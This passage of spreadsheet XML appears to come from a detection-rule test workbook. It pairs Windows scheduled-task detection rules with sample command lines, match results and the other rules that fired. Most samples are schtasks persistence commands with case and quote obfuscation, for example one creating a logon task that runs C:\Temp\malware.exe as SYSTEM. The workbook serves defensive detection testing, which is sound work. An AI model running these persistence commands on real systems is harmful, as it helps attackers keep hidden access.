        </is>
      </c>
      <c r="C1461" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1461" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1461" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "UpdateTask" /TR "C:\Temp\malware.exe" -"sc" onlogon /Ru SYSTEM</t>
        </is>
      </c>
      <c r="F1461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1461" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1461" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1461" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1461" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1462" ht="15.75" customHeight="1" s="42">
      <c r="A1462" s="43" t="n"/>
      <c r="B1462" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1462" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1462" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1462" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONLOGON /TN 123e4567-e89b-12d3-a456-426614174000 /TR "C:\Windows\System32\cmd.exe" /F</t>
        </is>
      </c>
      <c r="F1462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1462" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1462" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1462" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1462" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1463" ht="15.75" customHeight="1" s="42">
      <c r="A1463" s="43" t="n"/>
      <c r="B1463" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1463" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1463" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1463" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /sc ONLOGON /TN 123e4567-e89b-12d3-a456-426614174000 /TR "C:\Windows\System32\cmd.exe" -"F"</t>
        </is>
      </c>
      <c r="F1463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1463" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1463" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1463" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1463" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1464" ht="15.75" customHeight="1" s="42">
      <c r="A1464" s="43" t="n"/>
      <c r="B1464" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1464" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1464" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1464" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /SC ONLOGON /TN 123e4567-e89b-12d3-a456-426614174000 /"TR" "C:\Windows\System32\cmd.exe" /F</t>
        </is>
      </c>
      <c r="F1464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1464" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1464" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1464" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1464" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1465" ht="15.75" customHeight="1" s="42">
      <c r="A1465" s="43" t="n"/>
      <c r="B1465" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1465" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1465" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1465" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /sc ONLOGON /tn 123e4567-e89b-12d3-a456-426614174000 /TR "C:\Windows\System32\cmd.exe" /f</t>
        </is>
      </c>
      <c r="F1465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1465" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1465" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1465" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1465" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1466" ht="15.75" customHeight="1" s="42">
      <c r="A1466" s="43" t="n"/>
      <c r="B1466" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1466" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1466" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1466" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CReAtE /"SC" ONLOGON -"TN" 123e4567-e89b-12d3-a456-426614174000 /TR "C:\Windows\System32\cmd.exe" /F</t>
        </is>
      </c>
      <c r="F1466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1466" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1466" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1466" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1466" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1467" ht="15.75" customHeight="1" s="42">
      <c r="A1467" s="43" t="n"/>
      <c r="B1467" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1467" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1467" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1467" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /cREaTE /SC ONLOGON -"TN" 123e4567-e89b-12d3-a456-426614174000 -"TR" "C:\Windows\System32\cmd.exe" /f</t>
        </is>
      </c>
      <c r="F1467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1467" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1467" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1467" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1467" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1467" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1468" ht="15.75" customHeight="1" s="42">
      <c r="A1468" s="43" t="n"/>
      <c r="B1468" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1468" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1468" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1468" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /sc ONLOGON /tn 123e4567-e89b-12d3-a456-426614174000 /TR "C:\Windows\System32\cmd.exe" /F</t>
        </is>
      </c>
      <c r="F1468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1468" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1468" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1468" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1468" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1469" ht="15.75" customHeight="1" s="42">
      <c r="A1469" s="43" t="n"/>
      <c r="B1469" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1469" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1469" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1469" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CReAtE /SC ONLOGON /TN 123e4567-e89b-12d3-a456-426614174000 /TR "C:\Windows\System32\cmd.exe" /F</t>
        </is>
      </c>
      <c r="F1469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1469" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1469" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1469" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1469" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1470" ht="15.75" customHeight="1" s="42">
      <c r="A1470" s="43" t="n"/>
      <c r="B1470" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1470" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1470" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1470" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /sC ONLOGON /TN 123e4567-e89b-12d3-a456-426614174000 /Tr "C:\Windows\System32\cmd.exe" /F</t>
        </is>
      </c>
      <c r="F1470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1470" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1470" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1470" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1470" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1471" ht="15.75" customHeight="1" s="42">
      <c r="A1471" s="43" t="n"/>
      <c r="B1471" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1471" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1471" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1471" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATE /"SC" ONLOGON /Tn 123e4567-e89b-12d3-a456-426614174000 -"TR" "C:\Windows\System32\cmd.exe" -"F"</t>
        </is>
      </c>
      <c r="F1471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1471" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1471" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1471" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1472" ht="15.75" customHeight="1" s="42">
      <c r="A1472" s="43" t="n"/>
      <c r="B1472" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C1472" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D1472" s="44" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E1472" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /cReAtE /"SC" ONLOGON /TN 123e4567-e89b-12d3-a456-426614174000 /"TR" "C:\Windows\System32\cmd.exe" /"F"</t>
        </is>
      </c>
      <c r="F1472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1472" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1472" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1472" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1472" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1473" ht="15.75" customHeight="1" s="42">
      <c r="A1473" s="43" t="n"/>
      <c r="B1473" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1473" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1473" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1473" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /TN "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F1473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1473" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1473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73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1473" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1474" ht="15.75" customHeight="1" s="42">
      <c r="A1474" s="43" t="n"/>
      <c r="B1474" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1474" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1474" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1474" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"SC" ONCE /ST 00:00 /TN "UpdateTask" /tr "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F1474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1474" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1474" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1474" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1474" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1475" ht="15.75" customHeight="1" s="42">
      <c r="A1475" s="43" t="n"/>
      <c r="B1475" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1475" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1475" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1475" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create -"SC" ONCE /St 00:00 -"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F1475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1475" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1475" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1475" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1475" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1476" ht="15.75" customHeight="1" s="42">
      <c r="A1476" s="43" t="n"/>
      <c r="B1476" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1476" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1476" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1476" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /TN "UpdateTask" /"TR" "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F1476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1476" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1476" s="4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76" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1476" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1477" ht="15.75" customHeight="1" s="42">
      <c r="A1477" s="43" t="n"/>
      <c r="B1477" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1477" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1477" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1477" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEAtE /"SC" ONCE -"ST" 00:00 /Tn "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F1477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1477" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1477" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1477" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1477" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1478" ht="15.75" customHeight="1" s="42">
      <c r="A1478" s="43" t="n"/>
      <c r="B1478" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1478" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1478" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1478" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /sC ONCE /sT 00:00 /Tn "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F1478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1478" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1478" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1478" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1478" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1479" ht="15.75" customHeight="1" s="42">
      <c r="A1479" s="43" t="n"/>
      <c r="B1479" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1479" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1479" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1479" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F1479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1479" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1479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79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1479" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1480" ht="15.75" customHeight="1" s="42">
      <c r="A1480" s="43" t="n"/>
      <c r="B1480" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1480" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1480" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1480" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAte /SC ONCE /St 00:00 /tN "UpdateTask" /tR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F1480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1480" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1480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80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1480" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1481" ht="15.75" customHeight="1" s="42">
      <c r="A1481" s="43" t="n"/>
      <c r="B1481" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1481" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1481" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1481" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"SC" ONCE /St 00:00 -"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F1481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1481" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1481" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1481" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1481" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1482" ht="15.75" customHeight="1" s="42">
      <c r="A1482" s="43" t="n"/>
      <c r="B1482" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1482" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1482" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1482" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /creaTE /sC ONCE -"ST" 00:00 /TN "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F1482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1482" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1482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82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1482" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1483" ht="15.75" customHeight="1" s="42">
      <c r="A1483" s="43" t="n"/>
      <c r="B1483" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C1483" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D1483" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E1483" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /tn "UpdateTask" /tr "C:\\Windows\\Temp\\update.exe" /"F"</t>
        </is>
      </c>
      <c r="F1483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1483" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1483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483" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1483" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1484" ht="15.75" customHeight="1" s="42">
      <c r="A1484" s="43" t="n"/>
      <c r="B1484" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1484" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1484" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1484" s="4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F1484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1484" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1484" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1484" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1484" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1485" ht="15.75" customHeight="1" s="42">
      <c r="A1485" s="43" t="n"/>
      <c r="B1485" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C1485" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D1485" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E1485" s="4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F1485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1485" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1485" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
